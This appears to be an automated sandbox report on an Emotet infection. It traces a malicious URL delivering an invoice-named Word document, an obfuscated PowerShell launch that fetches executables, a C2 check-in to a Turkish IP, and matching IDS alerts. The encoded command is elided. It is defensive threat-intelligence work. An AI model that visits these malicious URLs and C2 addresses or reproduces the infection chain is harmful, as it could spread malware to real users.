URL: | http://web-extend.nl/cgi-bin/v0x8-dc8q-06/ |
Full analysis: | https://app.any.run/tasks/e2706005-b087-4826-9865-ce537914635d |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it has been upgraded into a highly destructive malware family. It targets mostly corporate victims, but private users also get infected in mass spam email campaigns. |
Analysis date: | August 08, 2020, 10:02:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 85F294C9BE15358F5E14191911F285C5 |
SHA1: | 6EBFD336A5780F17C1F46308F6F199BE51375AA3 |
SHA256: | 597DC3A835BFA376B4453B26F92A7B4EA48F3C644E4F709D03885A4EE83D7E47 |
SSDEEP: | 3:N1KJAUB/vyKI3dfU:COYiKIK |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2492 | "C:\Program Files\Internet Explorer\iexplore.exe" http://web-extend.nl/cgi-bin/v0x8-dc8q-06/ | C:\Program Files\Internet Explorer\iexplore.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
2684 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2492 CREDAT:267521 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3868 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\Inv_GTZA568_276367977.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3900 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2816 | powersheLL -e [base64-encoded command elided] | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3000 | C:\Users\admin\470.exe | C:\Users\admin\470.exe | — | wmiprvse.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1072 | "C:\Users\admin\AppData\Local\ir32_32\C_G18030.exe" | C:\Users\admin\AppData\Local\ir32_32\C_G18030.exe | — | 470.exe |
User: admin Integrity Level: MEDIUM Description: TreeEditor MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2684 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\Inv_GTZA568_276367977.doc.bw7ykmy.partial | — | |
MD5:— | SHA256:— | |||
2492 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF91F758BFDDD4417D.TMP | — | |
MD5:— | SHA256:— | |||
2492 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\Inv_GTZA568_276367977.doc.bw7ykmy.partial:Zone.Identifier | — | |
MD5:— | SHA256:— | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDFF0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_4A8893CF-3200-43C8-8DF4-ACCFADFF2E78.0\38066EB7.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2492 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\Cab41F6.tmp | — | |
MD5:— | SHA256:— | |||
2492 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\Tar41F7.tmp | — | |
MD5:— | SHA256:— | |||
2492 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver4237.tmp | — | |
MD5:— | SHA256:— | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFD634D089F2B4E696.TMP | — | |
MD5:— | SHA256:— | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF3D170AB7AAEBAE60.TMP | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2492 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
2492 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
2684 | iexplore.exe | GET | 200 | 185.27.142.203:80 | http://web-extend.nl/cgi-bin/v0x8-dc8q-06/ | NL | document | 97.8 Kb | unknown |
1072 | C_G18030.exe | POST | 200 | 78.189.60.109:443 | http://78.189.60.109:443/ZBtAxzrS3H/YTfCWHyJ0RD5jqV/VSELBDrlZwX/ | TR | binary | 132 b | malicious |
2492 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2492 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2492 | iexplore.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
— | — | 185.27.142.203:80 | web-extend.nl | LeaseWeb Netherlands B.V. | NL | unknown |
2684 | iexplore.exe | 185.27.142.203:80 | web-extend.nl | LeaseWeb Netherlands B.V. | NL | unknown |
2816 | powersheLL.exe | 64.227.110.109:443 | crathior.com | Peer 1 Network (USA) Inc. | US | unknown |
1072 | C_G18030.exe | 78.189.60.109:443 | — | Turk Telekom | TR | malicious |
Domain | IP | Reputation |
---|---|---|
web-extend.nl | — | unknown |
iecvlist.microsoft.com | — | whitelisted |
r20swj13mr.microsoft.com | — | whitelisted |
ocsp.digicert.com | — | whitelisted |
crathior.com | — | unknown |
PID | Process | Class | Message |
---|---|---|---|
1072 | C_G18030.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 22 |
1072 | C_G18030.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
1072 | C_G18030.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M8 |
1072 | C_G18030.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin M3 |
1072 | C_G18030.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |